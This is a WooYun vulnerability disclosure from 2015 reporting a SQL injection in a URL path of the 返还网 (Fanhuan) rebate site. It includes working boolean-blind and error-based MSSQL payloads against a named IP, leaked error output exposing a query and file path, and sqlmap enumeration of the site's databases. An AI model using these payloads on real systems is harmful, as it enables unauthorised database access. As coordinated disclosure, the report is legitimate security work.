当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125450

漏洞标题:返还网某处伪静态SQL注射

相关厂商:返还网

漏洞作者: 路人甲

提交时间:2015-07-08 18:58

修复时间:2015-08-23 09:08

公开时间:2015-08-23 09:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:19

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

http://218.5.72.107:8080/*
payload:
' or 1=1 and 'a'='a
' or 1=2 and 'a'='a
引号直接报错:还爆出了系统路径:F:\项目\WP\03_src\LGFZ.Weiping.UI\Controllers\
Exception Details: System.Data.SqlClient.SqlException: 字符串 '' 后的引号不完整。
字符串 '
) AS tbl
WHERE
row > 0 AND
row < 16' 后的引号不完整。
'
) AS tbl
WHERE
row > 0 AND
' 附近有语法错误。
SELECT ID,FatherID,UserID,UserName,ShopID,ProductId,UserIP,Content,Status,AddDate,replyTime,replyCount,Images,TargetUserID,TargetUserName,ForwardCount,CommentType
FROM (
SELECT ROW_NUMBER() OVER(ORDER BY AddDate desc) AS row, *
FROM ks_comment
WHERE FatherID = 0 and UserName = '' or 1=2'
) AS tbl
WHERE
row > 0 AND
row < 16
Source Error:

漏洞证明:

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://218.5.72.107:8080/-2235' OR 1648=1648 AND 'hFGi'='hFGi
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://218.5.72.107:8080/' AND 3433=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3433=3433) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND 'QOAu'='QOAu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'sa'
current user is DBA: False
available databases [10]:
[*] Edm
[*] fanhuansqlbbs
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sendemail
[*] tempdb
[*] WeiPing

修复方案:

这个地方得好好过滤下,各种姿势都能注

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-07-09 09:06

厂商回复:

感谢提交,谢谢!

最新状态:

暂无